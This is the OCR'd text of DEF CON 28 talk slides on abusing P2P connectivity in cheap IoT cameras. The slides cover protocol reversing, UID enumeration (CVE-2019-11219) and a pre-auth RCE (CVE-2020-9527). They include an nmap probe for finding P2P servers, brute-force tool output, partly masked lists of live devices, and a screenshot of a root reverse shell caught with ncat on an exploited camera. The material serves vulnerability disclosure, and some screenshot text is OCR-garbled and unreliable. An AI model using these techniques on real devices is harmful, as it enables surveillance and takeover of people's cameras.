Abusing P2P to Hack 
3 Million Cameras 


Paul Marrapese <paul@redprocyon.com> 
DEF CON 28 


What is this talk? 


* Overview of "convenience" feature found in millions of loT devices 
e P2P is found in cameras, baby monitors, smart doorbells, DVRs, NASes, alarm systems... 
e Hundreds of different brands impacted (supply chain issue) 
e How P2P exposes devices to the world 
e Devices are instantly accessible, even with NAT/firewalls 
e Obscure architecture and protocol (these devices aren't on Shodan!) 
e How P2P can be abused to remotely attack devices 
e Stealing creds with over-the-Internet MITM attacks 


e Exploiting devices behind firewalls to get root shells 


S whoami 


e Paul Marrapese (OSCP) 
e San Jose, CA 


e @PaulMarrapese / paul@redprocyon.com 


e https://hacked.camera 
e Red team at a large enterprise cloud company (opinions expressed are solely my own) 


e Reverse engineering, music production, photography 


All good things start with cats. 
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Best Seller 


Best Seller 


Baby Monitor Camera, Wansview 1080PHD Wireless Security 
Camera for Home, WiFi Pet Camera for Dog and Cat, 2 Way... 


Ww RK v 1,462 
$3499 
prime FREE Delivery Mon, Jul 20 


More Buying Choices 
$32.19 (5 used & new offers) 


Outdoor Security Camera, Wansview 1080P Waterproof WiFi 
Home Security Surveillance Bullet Camera with Night Visio... 


Wk ww ~ 656 
Black 
$3699 $45.99 
prime FREE Delivery Mon, Jul 20 


More Buying Choices 
$32.55 (4 used & new offers) 


WiFi Camera,VStarcam Wireless IP Camera with Night Vision 
for Indoor, 2 Way Audio and Multi-Users Home Security... 
WwW WY v 364 
720P 
$3899 

prime FREE Delivery Mon, Jul 20 


More Buying Choices 
$31.19 (2 used & new offers) 


Price may vary by color 
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SV3C HD 960P WiFi Wireless Security Camera Outdoor, 
Aluminum Metal Housing, Motion Detection... 


Akki 1,119 
$4599 


More Buying Choices 
$35.12 (2 used & new offers) 


Outdoor Security Camera, Wireless WiFi Home IP 
Surveillance Camera with IP66 Waterproof, 1080P, 30m IR... 
Ww RW 328 

Electronics 


$4999 


prime FREE Delivery Tue, Jul 21 


Jennov WiFi Camera Outdoor 1080P-PTZ IP Camera with 
Night Vision and Motion Detection-Wireless Security Came... 


WR 6 e* + 112 
WIFI CAMERA 2 Way Audio Dome 
$6990 

prime FREE Delivery Tue, Jul 21 
Only 8 left in stock - order soon. 


More Buying Choices 
$52.92 (2 used & new offers) 
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Cheap cams galore 


Audio WiFi Camera Outdoor, SV3C Motion 
Detection Security Camera, 720P HD Night 
Vision IP Cameras, Remote View Waterproof 
Surveillance CCTV for Indoor Outside, 
Support Max 128GB SD Card 


by SV3C 
v 1,663 ratings | 1000+ answered questions 


Was: $44.99 
Price: prime & FREE Returns 
You Save: 


Your cost could be $29.99. Eligible customers get a $10 bonus when 
reloading $100. 


Available at a lower price from other sellers, potentially without free Prime 
shipping. 


Size: 720P 


1 Pack 1080P 3MP 
$49.99 $55.99 


prime prime 


720P 


prime 


Wireless Wi-Fi 
Communication 
Technology 
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Enter any IPv4, IPv6 address or domain name: 
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Enter any IPv4, IPv6 address or domain name: 


47.93.34.139 


Shady cams galore! 


www.amazon.com > customer-reviews v 


Shady Camera - Amazon.com 


54.179.151.251 port 32100 UDP Reolink client sends broadcasts to 255.255.255.255 on port 
2000 which are also unnecessary. Don't recommend using this ... 


www.amazon.com > ask > questions 


Why does this camera keep wanting to reach out to 123.57 ... 


Why does this camera keep wanting to reach out to 123.57.136.155 on port 32100? how do i 
stop that from occurring? asked on May 29, 2017. Answer this ... 


www.amazon.com > customer-reviews 


Use at your own risk - Amazon.com 


This device tries to connect to a Chinese IP every few seconds (in my case Hangzhou, Zhejiang) 
over port 32100 which is a commonly used malicious backdoor. 


www.amazon.com > customer-reviews v 


the documentation is not the best and it brings hidden ... 


What is not documented is the constant communication with the following Chinese IP addresses 
using udp and port 32100: 47.88.16.73 120.78.75.50 59.110. 


www.amazon.com > Security-Surveillance-Waterproof-... v 


(Upgraded Series A) SV3C POE Camera ... - Amazon.com 


Its also recommended to block outgoing UDP port 32100 to try to prevent the risk on your 
router/firewall. You can also disable the UID use for the P2P in the ... 


Shady Camera 
Reviewed in the United States on November 23, 2016 


Works ok. I've set this up with Milestone XProtect software and it works well for the most part. The night 
vision works really well and is crystal clear. 


Now for the very bad: 

- seems to be connecting to multiple cloud servers for no apparent reason (nothing is configured to do so 
and I'm not sure of the data its transmitting yet) 

- IPs: 

--» 52.5.24.217 port 9603 UDP 

--> 54.72.248.104 port 32100 UDP 

--> 54.86.23.37 port 32100 UDP 

--> 54.179.151.251 port 32100 UDP 


the documentation is not the best and it brings hidden "features" that | don't really ... 
Reviewed in the United States on May 14, 2018 
Size: 720P 


I would not purchase this camera again. While this camera does work as advertised, the documentation is 
not the best and it brings hidden "features" that | don't really think anyone wants. 


P2P: 

The camera has a protocol it labels as P2P. This is used between the IOS / Android app, called CamHi, and 
the camera to find and possibly configure the camera on the local LAN after the camera is plugged into a 
Ethernet port. What is not documented is the constant communication with the following Chinese IP 
addresses using udp and port 32100: 


47.88.16.73 
120.78.75.50 
59.110.217.33 
47.52.252.63 


What is peer-to-peer (P2P)? 


e |n the context of loT, a convenience feature for connectivity 
e Plug and play: users can instantly connect to devices from anywhere 
e Eliminates technical barriers barriers for non-technical users 

e No port forwarding required 

e No dynamic DNS or remembering IP addresses required 

e No UPnP required (P2P is not UPnP) 


e Automatically accepts connections, even with NAT/firewall restrictions 


Your cheap camera's gaping security holes are now open to the world. Good luck. & 


Who provides P2P ? 


e Several different providers of P2P solutions in the industry 
e Largest is probably ThroughTek (TUTK)'s Kalay platform (> 66m devices!) 
e This talk will focus on 2 in particular: 
e CS2 Network P2P (» 50m devices?) 
e Libs: PPPP API, PPCS API, libPPPP API, libPPCS API 
e Shenzhen Yunni iLnkP2P (>3.6m devices) 
e Functionally-identical clone of CS2 P2P (even has compatible API) 


e Libs: libxqun, libXQP2P API, libobject, PPPP API 


1: https://www.throughtek.com/kalay_structure.html 
2: http://cs2-network.cn/iot/about/slide/slide.php?slide=1 


What are the risks of P2P? 


e P2P, by design, is meant to expose devices 
e |n many cases, no way to turn it off 
* You can obtain direct access to any device if you have its UID (unique identifier) 


e Devices are usually ARM-based, running BusyBox with everything as root 


e What could *possibly* go wrong? e 
e Tired: Eavesdropping, data theft, disabling security systems 


e Wired: Pre-auth RCE on millions of devices 996% 


Anatomy of a P2P Network 


P2P Servers 


e Our gateway to millions of devices 
e Manage all devices in the network 
e Orchestrate connections between clients and devices 
e Essentially C&C servers 
e Owned and operated by device manufacturers 
e Often hosted using Alibaba cloud or AWS (usually in sets of 3 for redundancy) 
e Listens on UDP port 32100 


e Hundreds of these on the Internet 


Devices 


e All have their own unique identifier (UID) 
e Key concept: used for connecting to the device 
e j.e., users don't directly use IP addresses 


e Should be considered "sensitive" 


E| PWD:admn 
e Anyone who knows the UID can connect "PPP-450140-FFBEC 


e Generated by P2P provider and provided to device 
manufacturer 


e Written to device NVRAM during manufacturing, sometimes printed on label 


Device UID 
DEFC-000123-HAXME 


Prefix Serial Number Check Code 


e Prefix: Used for vendor/product grouping (up to 8 letters) 
e Vendor may have several (e.g. DEFA, DEFB, DEFC) 
e Vendor's P2P server will only support their specific prefixes 
e Serial Number: Device identifier (typically 6-7 digits) 
e Sequentially generated 
* Check Code: Used to protect UIDs and prevent spoofing (5-8 letters) 
e Security feature 


e Generated using secret algorithm by the P2P provider 


Client 


e Desktop/mobile app for connecting to device 


* User enters UID in client, client sends connection request 
to the P2P servers 


Camera 


admin 


u Scan QR code, add UID 


Q Search Camera from LAN 
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Wireless Installation 


Protocol 


e Entirely UDP 
e Control messages to establish connections 
e "DRW" (device read/write) messages wrap application data (e.g. video, audio) 
e Guarantees both order and delivery despite being UDP 
e Most messages are just packed C structs with a 4-byte header 
e Magic number (always OxF1), message type (uint8), payload length (uint16) 


e Developed Wireshark dissector to aid with reversing and traffic analysis 


struct T message header 
byte order big endian; 
uint8id=hex> magic number; 
T message type message type; 
uint16 message size; 


Time Source Destination Protocol Length Info 
„353667 pppp 50596 
.353845 pppp 0596 

PPPP 50596 

PPPP 50596 

pppp 0596 

PPPP 50596 

PPPP 19258 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

„512016 pppp 

„512017 pppp 

„512017 pppp 

Bota re PPPP 

.516262 PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

PPPP 

. 544659 pppp 

.555746 pppp 

„555918 pppp 

„565823 pppp 
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struct T network address 
call parse sockaddr in le (); 
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ep PUNCH “TO (64) struct T_empty_message 

ISG PUNCH TO (64) T message header message header; 
ISG PUNCH PKT 

ISG PUNCH PKT (65) 

G PUNCH PKT (65) struct T MSG HELLO ACK 

ISG PUNCH PKT (65) T message header message header; 
T network address wan address; 
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50596 [MSG P2P REQ ACK (3 

50596 [MSG PUNCH TO (64)] 

506596 [MSG PUNCH TO (64)] struct T MSG HELLO TO 

46747 G PUNCH PKT (65)] T message header message header; 
36596 G HELLO ACK (1)] T network address target address 1; 
50596 T network address target address 2; 
50596 
50596 
46747 
46747 
46747 » 50596 
50596 » 46747 
50596 » 46747 
46747 » 50596 
50596 46747 
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struct T MSG QUERY DID 
T message header message header; 
string! ^| device name; 
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struct T MSG QUERY DID ACK 
T message header message header; 
User Datagram Protocol, Src Port: 32100, Dst Port: 50596 string! device uid; 
v pppp, message type: MSG PUNCH TO (64) | 
v message header 
magic number: Øxf1 (241) struct T MSG DEV LGN 
message type: MSG PUNCH TO (64) T message header message header; 
message size: 16 var string device uid = parse uid |); 
a uint8 nat type; 
family: uint24{de=-uint24be to api version(this)} api version; 
T network address local address; 


e 
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Connecting to Devices 


(or, how to punch through firewalls) 


UDP hole punching 


e A technique to establish direct connections even with NAT/firewalls 
e Takes advantage of how NAT creates inbound rules based on outbound packets 


e For example: if we make a DNS request, the router needs to create a rule so the response 
gets back to us 


e |f we have a target IP and port, we can create a rule by sending a packet there 
e But how do we know the peers IP and port if we cant talk to them? 


e We can use the P2P server to exchange address information! 


Both sides can then send packets to each other, which creates rules in their respective NATs 
to let packets from the other side through 


e Why yes, this *is* very similar to STUN! 


P2P Servers 
"Punch to 9.8.7.6:20000" "Punch to 1.2.3.4:10000" 


Client Device 
(1.2.3.4:10000) (9.8.7.6:20000) 


P2P Servers 


Device NAT 
opens port 
for client 


(1.2.3.4:10000) (9.8.7.6:20000) 


Client 


(1.2.3.4:10000) 


P2P Servers 


Client NAT 
opens port 
for device 


(9.8.7.6:20000) 


(1.2.3.4:10000) 


P2P Servers 


Direct connection 
established 


(9.8.7.6:20000) 


Relayed connections 


e UDP hole punching doesn't always work 
e As a fallback, peers can talk through a "relay server": 


e |f both sides can connect to the same relay, it can proxy traffic between them 


Relay | 
(2.4.6.8:30000) 


Client Device 
(1.2.3.4:10000) (9.8.7.6:20000) 


Superdevices 


e Devices that act as relays to support the network 


* Users have no way to opt out of this (hope you don't have bandwidth quotas!) 


Sketchy, but not actually uncommon in P2P architectures (supernodes) 


Spoiler alert: we're going to have fun with these. ® 


iia. 
Superdevice 
(6.6.6.6:30000) 


Client Device 
(1.2.3.4:10000) (9.8.7.6:20000) 


Hunting for Devices 


Finding P2P Servers 


Desktop and phone apps are one way to find P2P server addresses 
e More efficient: nmap UDP probes on cloud provider IP ranges! 
e Send hello message (9xf 19090099) to UDP port 32100 
e Valid P2P servers will respond with ACK message (0xf1010000) 
e Add udp 32100 "\xf1\x00\x600\x0@" to /usr/share/nmap/payloads 
e nmap -n -sn -PU32100 --open -iL ranges.txt 
e 618 confirmed P2P servers discovered as of July 2020 


e Discrepancies in responses allowed a fingerprinting technique to be developed 


86% are CS2, 1496 are iLnkP2P 


Finding Prefixes 


e To use P2P servers, we need to find out which prefixes they support 
e Again, desktop and phone apps are one way to find prefixes 


e Also, Amazon reviews... 


ing Prefixes 


Add Camera 


Back door 
Online 


Driveway 
Online 


Front door 
Online 


Dogs 


Online 


Parking 


Online 


Front yard 


Online 


Xtra 
Disconnected 


Xtra2 


Disconnected 
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Great low budget 
survalance system. 
By Scott on Oct 11, 2019 
Great low budget survalance system. | have 
8 Cameras covering our home drive way 
and dog kennel. The entire family can 
access the cameras remotely through the 
app. 


Images in this review 


me Add Camera 


BACKYARD 
Online 


TEITE 


FRONTYARD 
Online 


55 54 71 


BARNVIEW 


Online 
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EASY INTERFACE GREAT 
QUALITY 
By KR on Apr 


Very easy to set up, install, and the app 
interface is extremely simple. 

Great quality video/pictures. 

Can download to phone or screen shot. 


All settings adjustable via phone app. App 
claims to support up to 64 cams. I currently 
have 3. Switching between different cams or 
different cam's recorded video is quick. 
Motion detection is very sensitive and sends 
alert in real time. I have my record set to 5 
min intervals like my dash cam however that 
is also adjustable. Some security cams 
have choppy playback THIS CAM IS 
SMOOTH AND CLEAR. Night vision is 
impeccable. 


There is nothing | do not like about these 
cameras. 


| would like to have smart recognition for 
motion sensing BUT THAT WOULD BEA 


Request: 


Response: 


Invalid prefix (OxFD) 


Y pppp, message type: MSG P2P REQ (32) 
v message header 
magic number: Øxf1 (241) 
message type: 
message size: 
device uid: FAK 


v pppp, message type: MSG P2P REQ ACK (33) 
v message header 
magic number: Øxf1 (241) 
message type: MSG P2P REQ ACK 
message size: 
result: -3 
api version: 


fi 21 00 04 [È op 


Invalid UID, valid prefix (OxFF) 


pppp, message type: MSG P2P REQ (32) 
v message header 
magic number: Øxf1 (241) 
message type: MSG P2P REQ (32) 
message size: 36 
device uid: IIII-000123-ABCDE 
v local addres: 
family: 2 


m 


port: 6 
0. 


nm j x 
O VG) 


ip: @ 


v pppp, message type: MSG P2P REQ ACK ( 
v message header 
magic number: Øxf1 (241) 
message type: MSG P2P REG ACK | 
message size: 4 
result: -1 
api version: 0.0. 


Finding Prefixes 


[pau Letempest:src]$ node . enum/prefix.js 
(20: Brute-forcing 17576 prefixes (ETA: 1hrs) 
(20: 
(20: 
(20: 
(20: 
(20: 
(20: 
(20: 
(20: 
(20: 
(20: 


17: 
17: 
18: 
18: 
19: 
19; 
19: 
20: 
20: 
; 09. 
36. 


21 


21: 


30. 
58. 
25» 
252. 
14, 
20. 
4/. 
14, 
.990) 


41 


865) 
257) 
5/1) 
833) 
543) 
196) 
337) 
689) 


180) 
522) 


— info: 


info: 
info: 
info: 
info: 
info: 
info: 
info: 
info: 
info: 
info: 


5%... (BHV) 


10%... 
19% e e 


Found servers for EYE: 54.214.22.83 


20%... 
255... 
30%... 
35%... 
40%... 
45%... 


(CPQ) 
(DXL) 


(FFG) 
(GNA) 
(HUV) 
(JCQ) 
(KKL) 
(LSG) 


Finding Prefixes 


e Can infer validity of prefix from server response code 
e OXFD: Invalid prefix 
e OxFF: Valid prefix but invalid serial / check code 

e Can brute force all 3-letter combinations in ~1hr, 4 letter in ~36hrs 
e No rate limiting! 

e Discovered 488 distinct prefixes on 487 P2P servers as of July 2020 


* Average is 4 per server, but some servers support >130 prefixes 


Finding UIDs 


e We have prefixes, we can easily infer serial numbers (sequential numbers) 

e The problem is now the check code: 
e Exists to stop precisely this sort of attack 
e |f the UID is DEFC-000123-HAXME, DEFC-000123-HAXMF will not work 
e Keyspace makes brute forcing impractical 


e How can we get around this? 


Predictable iLnkP2P UIDs (CVE-2019-11219) 


e Some iLnkP2P libraries shipped with their secret check code algorithm 
e Uses modified MD5; the check code is the letters from the resulting hash (i.e. A-F) 
e Apparently included to validate UIDs, even though the server already does that wer 


e We can now connect to any device that uses iLnkP2P 


FFFF-019748-***EF 
FFFF-019751-***BF 
FFFF-019757-***DA 
FFFF-019760-***FC 
FFFF-019761-***DF 
FFFF-019764-***BD 
FFFF-019766-***FF 
FFFF-019770-***BE 
FFFF-019779-***CB 
FFFF-019780- ***DE 
FFFF-019790-***FF 
FFFF-019798-***BB 
FFFF-019804-***CB 
FFFF-019807-***AF 
FFFF-019813-***EC 
FFFF-019825-***AF 
FFFF-019827-***DF 
FFFF-019833-***CB 
FFFF-019841-***EA 
FFFF-019846-***FD 
FFFF-019849-***AB 
FFFF-019851-***EF 
FFFF-019874-***FD 
FFFF-019875-***BB 
FFFF-019878-***AE 
FFFF-Ø19889-***AF 
FFFF-019890-***AA 
FFFF-019896-***EE 
FFFF-019897-***EA 
FFFF-019900-*** 

FFFF-019908-***CF 
FFFF-019910-***BA 
FFFF-019954-***CD 
FFFF-Ø19955-***EB 
FFFF-019968-***DA 
FFFF-019970-***EA 
FFFF-@19972-***BA 
FFFF-Ø19984-***FF 
FFFF-019990-***FE 
FFFF-019991-***AA 
FFFF-Ø19999-***AD 
FFFF-020004-***EE 
FFFF-020009-***AF 
FFFF-020015-***DB 
FFFF-020017-***FF 
FFFF-020018-***FB 
FFFF-020024-***BB 
FFFF-020025-***EC 
FFFF-020028-***BC 
FFFF-020032-***CD 
FFFF-020043-***DB 
FFFF-020046-***FA 
FFFF-020053-***BE 
FFFF-020060- ***BC 


ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 


79.47.**.** (Reggio Emilia, Emilia-Romagna, Italy) 
93.149.**.** (Rome, Lazio, Italy) 

151.30.**.** (Monza, Lombardia, Italy) 

90.104.**.** (Cholet, France) 

151.30.**.** (Monza, Lombardia, Italy) 

37.77.**.** (Sparanise, Campania, Italy) 

2.32.**.** (Castano Primo, Lombardia, Italy) 
62.94.**.** (Pescosansonesco, Abruzzo, Italy) 
139.47.**.** (Madrid, Madrid, Comunidad de, Spain) 
84.33.**.** (Italy) 

37.183.**.** (Italy) 

31.156.**.** (Santa Teresa di Riva, Sicilia, Italy) 
93.16.**.** (Herserange, France) 

93.40.**.** (Italy) 

46.251.**.** (Monzon, Aragón, Spain) 

82.52.**.** (Bologna, Emilia-Romagna, Italy) 
93.42.**.** (Milan, Lombardia, Italy) 

189.5.**.** (Goiânia, Goiás, Brazil) 

146.66.**.** (Lleida, Catalunya, Spain) 
109.167.**.** (Denia, Valenciana, Comunidad, Spain) 


89.249.**.** (Borgo Valsugana, Trentino-Alto Adige, Italy) 


37.163.**.** (Italy) 

151.42.**.** (Bologna, Emilia-Romagna, Italy) 
79.1.**.** (Vinci, Toscana, Italy) 
84.101.**.** (Clermont-Ferrand, France) 
151.37.**.** (Rome, Lazio, Italy) 
176.10.**.** (Schio, Veneto, Italy) 
91.174.**.** (France) 

92.49.**.** (Lamentin, Guadeloupe) 
188.217.**.** (Rome, Lazio, Italy) 
95.251.**.** (Pioltello, Lombardia, Italy) 
84.33.**.** (Italy) 

151.0.**.** (Parma, Emilia-Romagna, Italy) 
87.20.**.** (Naples, Campania, Italy) 
79.40.**,** (Gavardo, Lombardia, Italy) 
81.203.**.** (Ciudad Real, Castilla-La Mancha, Spain) 
79.46.**.** (Pineto, Abruzzo, Italy) 
188.10.**.** (Italy) 

46.251.**.** (Monzon, Aragón, Spain) 
37.77.**.** (Sparanise, Campania, Italy) 
90.170.**.** (Vila-real, Valenciana, Comunidad, Spain) 
37.119.**.** (Milan, Lombardia, Italy) 
77.204.**.** (Louveciennes, France) 
141.237.**.** (Athens, Attiki, Greece) 
91.167.**.** (Guilherand-Granges, France) 
92.148.**.** (Lille, France) 

93.34.**.** (Turin, Piemonte, Italy) 
78.228.**.** (Courthezon, France) 
86.248.**.** (L'Etrat, France) 

79.47.**.** (Parma, Emilia-Romagna, Italy) 
178.59.**.** (Kozani, Dytiki Makedonia, Greece) 
85.170.**.** (Guyancourt, France) 
78.195.**.** (Vedene, France) 

93.51.**.** (Turin, Piemonte, Italy) 


ZZZZ-017501-***FD 


ZZZZ-@17502-***AB i 


Z222-017504-***FB 
Z222-017508-***BA 
ZZZZ-017516-***ED 
ZZZZ-@17511-***BB 
ZZZZ-017516-***FB 
ZZZZ-017523-***AF 
Z222-017524-***AC 
72777-01/529-"**FE 
Z222-017532-***BA 
7227-0175385-**9REF 
ZZZZ-017538-***DB 
ZZZZ-@17539-***CE 
Z222-017540-***CC 
Z222-017541-***AD 
ZZ222-017548-***EA 
Z222-017549-***DE 
Z222-017550- ***FA 
I272-017553-***"pc 
Z222-017558-***CC 
Z222-017561-***AC 
ZZZZ-017564-***AE 
ZZZZ-017565 -***BF 
Z222-017566-***EE 
ZZZZ-017569-***FC 
Z222-017570-***DA 
7272-017571-***BC 
ZZZZ-017572-***CA 
ZZZZ-017573-***EA 


Z222-017581-***FD i 


4737-01 7582 ESFE 
2221-017585-***CE 
Z222-017586-***DF 
Z222-017591-***DF 
2722-017593-***BC 
ZZZZ-017594-***AF 
Z222-017596-***CE 
721/-01/597-***FR 
Z222-017599-***CB 
Z222-017602-***FD 
ZZZZ-017603-***CA 
ZZZZ-017606-***DF 
Z222-017619-***EA 
Z222-017620-***AB 
Z222-017621-***DE 
ZZZZ-017625-***EE 
ZZZZ-017628-***DC 
ZZZZ-017630-***CF 
Z222-017631-***BF 
ZZZZ-017632-***FB 
Z222-017635-***AF 
Z222-017636-***CB 
ZZZZ-@17639-***BC 


is 


is 


is 


ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 
ONLINE 


Predictable iLnkP2P UIDs (CVE-2019-11219) 


180.183 .**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


1.20.**.** (Thailand) 
123.97.**.** (China) 


180.183.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


134.236.**.** (Thailand) 


180.183.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 
171.97.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


123.97.**.** (China) 


171.99.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


182.53.**.** (Kamphaeng Phet, Kamphaeng Phet, Thailand) 
120.239.**.** (Xinxing, China) 
117.182.**.** (Laibin, China) 


180.183.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


203.156.**.** (Shanghai, China) 


180.183.**.** (Bangkok, Krung Thep Maha Nakhon, Thailand) 


93.216.**.** (Oldenburg, Niedersachsen, Germany) 
93.228.**.** (Marl, Nordrhein-Westfalen, Germany) 
2.200.**.** (Lindau, Schleswig-Holstein, Germany) 
84.184.**.** (Wurzen, Sachsen, Germany) 
46.114.**.** (Germany) 

46.87.**.** (Velten, Brandenburg, Germany) 
93.255.**.** (Munnerstadt, Bayern, Germany) 
91.6.**.** (Emden, Niedersachsen, Germany) 
95.222.**.** (Wuppertal, Nordrhein-Westfalen, Germany) 
91.61.**.** (Suelzetal, Sachsen-Anhalt, Germany) 
91.248.**.** (Lemgo, Nordrhein-Westfalen, Germany) 
185.151.**.** (Vienna, Wien, Austria) 

91.248.**.** (Aurich, Niedersachsen, Germany) 
84.184.**.** (Wurzen, Sachsen, Germany) 
79.228.**.** (Feucht, Bayern, Germany) 

46.80.**.** (Lingen, Miedersachsen, Germany) 
84.115.**.** (Graz, Steiermark, Austria) 
79.225.**.** (Erding, Bayern, Germany) 

79.215.**.** (Puderbach, Rheinland-Pfalz, Germany) 
80.134.**.** (Chemnitz, Sachsen, Germany) 
2.125.**.** (Hayes, England, United Kingdom) 
79.66.**.** (Edinburgh, Scotland, United Kingdom) 
81.97.**.** (Peterborough, England, United Kingdom) 
92.232.**.** (Liverpool, England, United Kingdom) 
87.156.**.** (Siegburg, Nordrhein-Westfalen, Germany) 
82.23.**.** (Wilmslow, England, United Kingdom) 
91.61.**.** (Suelzetal, Sachsen-Anhalt, Germany) 
81.2.**.** (Dartford, England, United Kingdom) 
82.207.**.** (Herne, Nordrhein-Westfalen, Germany) 
84.118.**.** (Siegen, Nordrhein-Westfalen, Germany) 
91.96.**.** (Bremervoerde, Niedersachsen, Germany) 
92.207.**.** (Hove, England, United Kingdom) 
86.190.**.** (Pinner, England, United Kingdom) 
77.190.**.** (Munich, Bayern, Germany) 

88.106.**.** (Birmingham, England, United Kingdom) 
95.146.**.** (Kilmarnock, Scotland, United Kingdom) 
92.13.**.** (Burnley, England, United Kingdom) 
94.8.**.** (Bristol, England, United Kingdom) 
92.10.**.** (Romford, England, United Kingdom) 


Predictable iLnkP2P UIDs (CVE-2019-11219) 


e Over 3.6 million devices as of July 2020, many of which use default passwords 
e Disclosed to Shenzhen Yunni Technology in February 2019 

e No response despite several attempts 

e New iLnkP2P UIDs are still being issued today 


e Does not affect CS2... but more on that later. 


Exploiting Devices 


(or, how to shoot fish in a barrel) 


Let s find some camera vulns! 


e Shenzhen Hichip Vision Technology, Co. 
e Major manufacturer, worldwide market (ODM) 
e Used by a huge number of OEMs 
e OEMs buy from Hichip and add their own branding 
e Can easily identify OEMs by their use of the "CamHi" app 
e At least 50 P2P servers and 29 prefixes 


e 2.95 million (81%) of the iLnkP2P devices I've found have been Hichip 


OEMs using Hichip 


Accfly 
Alptop 
Anlink 
Avidsen 
Besdersec 
BOAVISION 

COOAU 
CPVAN 
Ctronics 


D3D Security 


Dericam 
Elex System 
Elite Security 
ENSTER 
ePGes 
Escam 
FLOUREON 
GatoCam 
GENBOLT 


Hongjingtian (HJT) 


ICAMI 
ieGeek 
Jecurity 
Jennov 
KKMoon 
LEFTEK 
Loosafe 
Luowice 
MEOBHI 


Nesuniq 


Nettoly 
OWSOO 
PNI 
ProElite 
QZT 
NOEN 
SDETER 
SV3C 
SY2L 


Tenvis 


ThinkValue 
THOMSON 
TOMLOV 
TonTon Security 
TPTEK 
Wanscam 
WGCC 
WYJW 
ZILINK 


Zysecurity 


Hunting for vulnerabilities 


e Obtained firmware samples from reseller sites (often just a ZIP file, easy to analyze) 
e HI P2P Cmd ReadRequest handles commands received over P2P 


e Used for everything including login; you don't need auth to hit this function 


E while ( 1 ) 
H memset (&buff, val, 1024u); 
* res = HI P2P Cmd ReadRequest(handle, val, (int)&buff); 


Hunting for vulnerabilities 


è else if ( "buff == @x99999999 ) 


1 

2 length = *(buff + 4); 

3 if ( length > 10240 ) 

4 

5 printf("HI ReadCmd: head param len=%d error Mn", *(buff + 4)); 
6 result - -1010; 

7 >) 

8 else 

9 H 

a if ( !length ) 

1 return 8; 

2 res2 = PPCS Read(handle); 

3 if ( res2 >= 0 ) 

4 return @; 

5 if ( res2 == -3 ) 

6 return -1005; 

7 printf("HI ReadCmd:PPCS Read data error %d\n", res2); 
8 result = -1007; 

9 ) 

e } 

1 else 

3 printf( HI ReadCmd: head param flag error @X%x\n"); 
4 result = -1ØØ1; 

5 ] 

6 return result; 


Hunting for vulnerabilities 


if ( length > 10240 ) 


printf( "HI ReadCmd: head param len=%d error \n", *(buff + 4)); 
result = -1010; 
I 


Pre-auth remote code execution (CVE-2020-9527) 


[paul@aurora:checksec.sh]$ ./checksec --file=/home/paul/ipc_server 


RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols 
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH No Symbols 
[paul@aurora:checksec.sh]$ ./checksec --filez/home/paul/libAPILib.so 

RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols 

No RELRO No canary found NX enabled DSO No RPATH No RUNPATH No Symbols 
[paul@aurora:checksec.sh]$ ./checksec --file=/home/paul/libhichip.so 

RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols 

No RELRO No canary found NX enabled DSO No RPATH No RUNPATH No Symbols 


[paul@aurora:checksec.sh]$ B 


Pre-auth remote code execution (CVE-2020-9527) 


[paul@juno ~]$ sudo ncat -lvk 80 

Version 7.80 ( https://nmap.org/ncat ) 
Listening on 
Listening on 0.0.0.0:80 
Connection from 
Connection from 


Ncat: 
Ncat: 
Ncat: 
Ncat: 
Ncat: 
pwd 
/tmp 
ls -al 
drwxr-xr-x 
drwxrwxrwt 
-rwxr-xr-x 
prw-r--r-—— 


kä kä Oh 


root 
root 
root 
root 


root 
root 
root 
root 


80 Jun 

380 Jun 
411085 Jun 
H Jun 


7 09:18. 
7 09:18 .. 
7 09:18 nc 
7 09:19 x 


Pre-auth remote code execution (CVE-2020-9527) 


hostapd8192 5g.conf 
imx307.bin 
ipcam_upnp. xml 
resolv.conf 


run 
5c2232.bin 

udhcpc 

udhcps 

wifi.conf 

cat config_user.ini 


[user] 
username 
password 
authtype 
authgroup 


[user1] 

username 
password 
authtype 


H HW W 

- c 
vi 
rp 
E 


Pre-auth remote code execution (CVE-2020-9527) 


/ # wpa_cli 
wpa cli v2.6 
Copyright (c) 2004-2016, Jouni Malinen <j@w1.fi> and contributors 


This software may be distributed under the terms of the BSD license. 
See README for more details. 


Selected interface 'wlane' 
Interactive mode 

» Scan 

OK 


«3»CTRL-EVENT - SCAN- RESULTS 


> > scan results 
bssid / frequency / signal level / flags / ssid 


